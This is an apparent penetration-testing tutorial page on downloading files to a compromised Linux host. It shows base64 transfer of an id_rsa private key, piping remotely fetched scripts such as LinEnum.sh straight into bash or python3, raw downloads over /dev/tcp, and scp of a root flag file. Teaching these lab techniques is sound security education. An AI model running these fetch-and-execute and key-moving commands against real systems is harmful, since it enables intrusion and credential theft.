Download

Base64 Encoding / Decoding

This method does not require network communication. If we have access to a terminal, we can encode a file to a base64 string, copy its content into the terminal and perform the reverse operation. Starting with checking MD5 hash:

md5sum id_rsa

We use cat to print the file content, and base64 encode the output using a pipe |. We used the option -w 0 to create only one line and ended up with the command with a semi-colon (;) and echo keyword to start a new line and make it easier to copy.

cat id_rsa |base64 -w 0;echo

We copy this content, paste it onto our Linux target machine, and use base64 with the option `-d' to decode it. And we can confirm the MD5 hash.

echo -n 'LWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRskJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsa

Web Download - wget, curl

Two of the most common utilities in Linux distributions to interact with web applications are wget and curl.

wget https://url.com/path/LinEnum.sh -O /tmp/LinEnum.sh

curl -o /tmp/LinEnum.sh https://url.com/path/LinEnum.sh

Fileless Attacks

Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

Note: Some payloads such as mkfifo write files to disk. Keep in mind that while the execution of the payload may be fileless when you use a pipe, depending on the payload chosen it may create temporary files on the OS.

Let's take the cURL command we used, and instead of downloading LinEnum.sh, let's execute it directly using a pipe.

curl https://url.com/path/LinEnum.sh | bash

We can also use wget:

wget -qO- https://url.com/path/helloworld.py | python3

Download with Bash (/dev/tcp)

There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with --enable-net-redirections), the built-in /dev/TCP device file can be used for simple file downloads.

We first connect to the webserver:

exec 3<>/dev/tcp/10.10.10.32/80

We send a GET request:

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

To print the response:

cat <&3

SSH Downloads

SSH implementation comes with an SCP utility for remote file transfer that, by default, uses the SSH protocol.

SCP (secure copy) is a command-line utility that allows you to copy files and directories between two hosts securely. We can copy our files from local to remote servers and from remote servers to our local machine.

To setup and start SSH:

sudo systemctl enable ssh

sudo systemctl start ssh

We can also use netstat to check for connections:

netstat -lnpt

Now, to download a file:

scp [email protected]:/root/myroot.txt .

Note: You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.

PreviousLinux File Transfer NextUpload

Last updated 1 year ago